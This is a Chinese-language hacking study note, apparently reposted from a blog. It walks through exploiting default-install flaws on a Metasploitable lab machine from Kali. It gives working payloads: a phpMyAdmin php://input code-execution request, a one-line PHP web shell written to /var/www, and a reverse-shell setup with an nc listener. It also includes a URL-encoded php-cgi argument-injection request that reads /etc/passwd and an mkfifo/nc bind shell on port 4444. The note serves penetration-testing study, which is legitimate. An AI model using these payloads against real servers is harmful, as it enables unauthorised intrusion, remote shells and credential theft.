2. 程式人生 > >Kali學習筆記29:預設安裝漏洞

Kali學習筆記29:預設安裝漏洞

阿新 發佈:2018-11-14

文章的格式也許不是很好看,也沒有什麼合理的順序

完全是想到什麼寫一些什麼,但各個方面都涵蓋到了

能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道

 

早期Windows預設自動開啟很多服務

很多的黑客就會利用這些漏洞輕易獲取System許可權

在Linux和Windows系統中都會有很多的預設安裝漏洞

下面我就典型的案例來分析:

 

目標靶機Metasploitable的IP:192.168.163.129

Kali機器的IP:192.168.163.132

 

PHP部署的程式猿會知道:

phpMyAdmin專門用來管理MySQL資料庫

如果粗心的程式猿就會忘記進行配置

於是我們可以訪問到一些敏感的目錄(早期版本):

例如phpMyAdmin/setup

 

如果程式猿不進行一些訪問限制,那麼很多的黑客就可以通過這種方式來進入,從而進行惡意的操作

 

只是說沒有什麼意思,下面我具體地來利用這個漏洞來測試:

我用Burp來重發請求,並且做一定的修改:

POST http://192.168.163.129/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1                 
Host: 192.168.163.129
 

<?php 
passthru('id');
die();              
?>

通過上邊的一系列程式碼使目標機器執行作業系統的id命令

利用Burp的Repeater做到了,獲取了UID

 

 

那麼其他命令呢?比如ls

 

 

但是,我們如果傳送一些管理員許可權才可以使用的命令:比如reboot

這時候就不可以做了,因為我們獲取的只是普通許可權

 

那麼,我們是否可以寫檔案呢?是否可以獲取shell呢(其實這已經獲取了shell)?

 

第一種上傳網頁木馬

echo
 
 "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" >/var/www/2.php

 

伺服器返回了OK

 

接下來我們訪問:192.168.163.129/2.php?cmd=[命令],就得到shell了

 

 

然後就可以做提權了

 

第二種:使用Kali自帶的一些指令碼,直接獲取shell:反連Shell

我把它複製出來,稍作修改就可以使用:

 

 

 

儲存

 

然後把全篇內容作為Body用Repeater傳送:

注意這裡的HOST必須是Kali的IP

 

同時用nc監聽:nc -vlp

 

傳送後就獲得了真正的Shell

注意:這裡獲取了shell,但是並沒有在目標伺服器上寫入資料,只是反連接獲取了一個shell

 

有一個小問題:獲取了Shell,但是無法執行Ifconfig這個基本命令,需要怎麼辦?

whereis ifconfig搜尋位置

進入目標目錄,然後./ifconcig即可

 

Ubuntu/Debain預設安裝PHP5-CGI漏洞

其針對Apache/PHP遠端程式碼執行漏洞攻擊

該漏洞存在於使用PHP的Apache伺服器,在Debian和Ubuntu的伺服器上預設安裝php5-cgi模組的伺服器都存在此漏洞。

程式設計師可以使用CGI模組在PHP程式碼中呼叫作業系統的命令

如果安裝了PHP5-CGI,則會在/usr/lib/cgi-bin下面生成兩個二進位制檔案:php和php5

下面我會利用這裡的php遠端執行程式碼

我們傳送編碼後的引數資訊(編碼是為了防止伺服器過濾資訊)去獲取目標伺服器的shell

POST 
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 123
Content-Length: 45



<?php
echo system('cat /etc/passwd');
?>

 

不過,遺憾的是,這裡我失敗了

 

成功的話,理論上可以參照上邊的方式繼續進行滲透

甚至可以直接寫入指令,讓目標系統直接開啟某個埠,我用NC連線即可:

<?php
echo system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe');
?>

 

這一篇稍簡短一些,後邊我們繼續

 

相關推薦

Kali學習筆記29預設安裝漏洞

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   早期Windows預設自動開啟很多服務 很多的黑客就會利用這些漏洞輕易獲取System許可權 在Linux和Windows系統中都會有很多

Kali學習筆記30手動Web漏洞挖掘(2)

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   實驗環境: Kali機器:192.168.163.132 Metasploitable靶機:192.168.163.129  

Kali學習筆記22緩衝區溢位漏洞利用實驗

實驗機器: Kali虛擬機器一臺(192.168.163.133) Windows XP虛擬機器一臺(192.168.163.130) 如何用Kali虛擬機器一步一步“黑掉”這個windowsXP虛擬機器呢? 用到的軟體: SLmail程式(存在緩衝區溢位漏洞) ImmunityDebugger(除錯工具

Kali學習筆記31目錄遍歷漏洞、檔案包含漏洞

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   目錄遍歷漏洞: 應用程式如果有操作檔案的功能,限制不嚴格會導致可以訪問到WEB目錄意外的檔案 目錄遍歷漏洞和檔案包含漏洞本質以及利用方法一

Kali學習筆記5TCPDUMP詳細使用方法

CA 自己 ring int 十六 一行 全部 kali info Kali自帶Wireshark,但一般的Linux系統是不帶的,需要自行下載,並且過程略復雜 而純字符界面的Linux系統無法使用Wireshark 但是,所有Linux系統都會安裝TCPDUMP:一種基於

Kali學習筆記7SHODAN搜索引擎

isp Go 6.2 www. image try 域名 主機 httpd SHODAN搜索引擎不像百度谷歌等,它們爬取的是網頁,而SHODAN搜索的是設備。 物聯網使用過程中,通常容易出現安全問題,如果被黑客用SHODAN搜索到,後果不堪設想。 網站:https://

Kali學習筆記11nmap在二層發現中的應用

clas conf DC echo broadcast col 9.png ace arping nmap在二層發現中的使用: nmap只需要一行即可實現arping的一個腳本:並且速度更快 #!/bin/bash if [ "$#" -ne 1 ];then ec

Kali學習筆記13Scapy在二層發現中的使用

發送 kali 文件 查詢 一個 mac地址 調用函數 學習筆記 開啟 直接輸入scapy,發現丟失文件或者有錯誤 這時候,輸入這行即可: 耗時不多,發現下載完成之後就可以正常開啟scapy了! 簡單使用方式:就像調用函數的方式: 示例:這裏我要定制一個ARP數據

Kali學習筆記10端口掃描詳解(下)

repl .com pan pytho format www. run 筆記 inf 上一篇先是介紹了UDP的端口掃描,又談了TCP的不完全連接端口掃描 https://www.cnblogs.com/xuyiqing/p/9389276.html 接下來我們看看TCP的全

Kali學習筆記11僵屍掃描案例

runtime spa level rbo lag 端口開放 ref zomb evel 什麽是僵屍掃描?本質也是端口掃描,不過是一種極其隱蔽的掃描方式 所以幾乎不會被發現,不過也有著很大缺陷:掃描條件很高 首先需要有一臺僵屍機,這裏我找好一臺win10僵屍機器,IP地

Kali學習筆記13操作系統識別

mage 系統識別 ble 操作 沒有 esp xxx turn 類型 為什麽要掃描操作系統呢? 其實和上一篇博客:《服務掃描》類似,都是為了能夠發現漏洞 發現什麽漏洞? 不同的操作系統、相同操作系統不同版本,都存在著一些可以利用的漏洞 而且,不同的系統會默認開放不同的

Kali學習筆記25Arachni使用(實現分散式掃描)

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   Arachni不同於上次介紹的nikto和skipfish 是一個Web介面的一個Web掃描器 Arachni的強大不必多說: 國際知名

Kali學習筆記26OWASP_ZAP

strong 方式 查看 字段 表單 arachni 圖片 pos sap 文章的格式也許不是很好看,也沒有什麽合理的順序 完全是想到什麽寫一些什麽,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和杠精們請繞道 OWASP_ZAP掃描器不同於之前介紹的Web掃

Kali學習筆記28Burpsuite(下)

fig 一個 完全 個數 攻擊 利用 post 有時 隨機算法 文章的格式也許不是很好看,也沒有什麽合理的順序 完全是想到什麽寫一些什麽,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和杠精們請繞道 掃描: 上一篇介紹到了爬網,那麽到這裏我以及爬取了一個網站

Kali學習筆記16Nmap詳細講解

在前面十五篇部落格中,幾乎每一篇都有介紹Nmap,這裡系統地介紹下每個引數: 注意:區分每個引數的大小寫 -iL:列好的IP放在一個文本里面,可以直接掃描這個文字 用法:namp -iL <文字名> -iR:隨機掃指定數目的IP: 用法:nmap -iR <IP數量> 示例:我現在

Kali學習筆記21緩衝區溢位實驗(上)

上一篇文章,我已經做好了緩衝區溢位實驗的準備工作: 下面就是Kali虛擬機器對緩衝區溢位的測試:  已經知道目標IP為:192.168.163.130 連線目標機器110埠成功,接下來進行測試 事先已經知道PASS命令存在緩衝區溢位漏洞: 只要在PASS後邊輸入的資料達到某一個值時,就會出現緩衝區溢位

nanopi NEO2 學習筆記 3python安裝第三方GPIO

編譯 spa 修改 neo spi 分享 install 是個 選擇 如果我要用python控制NEO2的各種引腳,i2c 或 spi ,RPi.GPIO模塊是個非常好的選擇 這個第三方模塊是來自樹莓派的,好像友善之臂的工程師稍作修改移植到了NEO2上,就放在 /root/

Angular學習筆記29事件繫結

事件繫結     前面的繫結都是按照 : 元素到元件的方式     但是在一個頁面不可能只是資料展示給使用者,而使用者對頁面沒有任何操作,不能進行和頁面的互動操作,在與用的互動操作時,怎麼才能知道使用者進行了怎麼樣的操作和互動呢? &n

Java學習筆記29Java基礎類庫簡介及lang包介紹彙總

Java基礎類庫簡介及lang包介紹 https://blog.csdn.net/gaoshoum/article/details/50194181 java.lang包介紹 https://blog.csdn.net/u012834750/article/details/7936155

Kali學習筆記33Linux系統緩沖區溢出實驗

目標 x11 們的 mage 意義 查看 二進制 無法 linu 之前做過一個Windows應用SLmail的緩沖區溢出的實驗 這次來做一個Linux平臺的緩沖區溢出實驗: 緩沖區溢出是什麽? 學過匯編的應該知道,當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤